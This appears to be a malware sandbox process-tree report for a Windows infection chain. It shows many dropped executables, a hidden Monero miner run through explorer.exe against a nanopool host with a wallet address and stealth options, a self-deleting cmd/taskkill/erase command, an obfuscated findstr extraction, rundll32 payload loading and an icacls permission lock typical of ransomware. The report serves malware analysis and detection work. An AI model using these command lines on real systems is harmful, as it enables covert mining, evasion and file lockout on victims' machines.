C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2352
-
C:\ProgramData\6194770.exe"C:\ProgramData\6194770.exe"8⤵PID:964
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 964 -s 17409⤵
- Program crash
PID:3212
-
-
-
C:\ProgramData\7314776.exe"C:\ProgramData\7314776.exe"8⤵PID:952
-
-
C:\ProgramData\5019268.exe"C:\ProgramData\5019268.exe"8⤵PID:2080
-
-
C:\ProgramData\3398566.exe"C:\ProgramData\3398566.exe"8⤵PID:3388
-
-
C:\ProgramData\2084898.exe"C:\ProgramData\2084898.exe"8⤵PID:3676
-
-
C:\ProgramData\2146951.exe"C:\ProgramData\2146951.exe"8⤵PID:3988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 17929⤵
- Program crash
PID:3532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:1604
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:2092
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1172
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2868
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:2744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:680
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"7⤵PID:316
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\is-AE86G.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-AE86G.tmp\setup_2.tmp" /SL5="$20300,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:2948
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2772
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵
- Loads dropped DLL
PID:1664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS45789644\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2136
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2712 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2740
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵PID:2024
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2024 CREDAT:275457 /prefetch:22⤵PID:2484
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2024 CREDAT:537604 /prefetch:22⤵PID:3584
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv1⤵PID:2820
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2520 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:272
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1760
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E9291B763C57051CDE718C033CD9C9F5 C2⤵PID:3452
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3720 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3712
-
-
C:\Users\Admin\AppData\Local\Temp\D3C3.exeC:\Users\Admin\AppData\Local\Temp\D3C3.exe1⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\4E02.exeC:\Users\Admin\AppData\Local\Temp\4E02.exe1⤵PID:2936
-
C:\Users\Admin\AppData\Local\Temp\4E02.exeC:\Users\Admin\AppData\Local\Temp\4E02.exe2⤵PID:4028
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\b051d442-dc29-4c73-9b20-52ecaa04af13" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3704
-
-
-
C:\Users\Admin\AppData\Local\Temp\9A1F.exeC:\Users\Admin\AppData\Local\Temp\9A1F.exe1⤵PID:836
-
C:\Users\Admin\AppData\Local\Temp\E285.exeC:\Users\Admin\AppData\Local\Temp\E285.exe1⤵PID:2972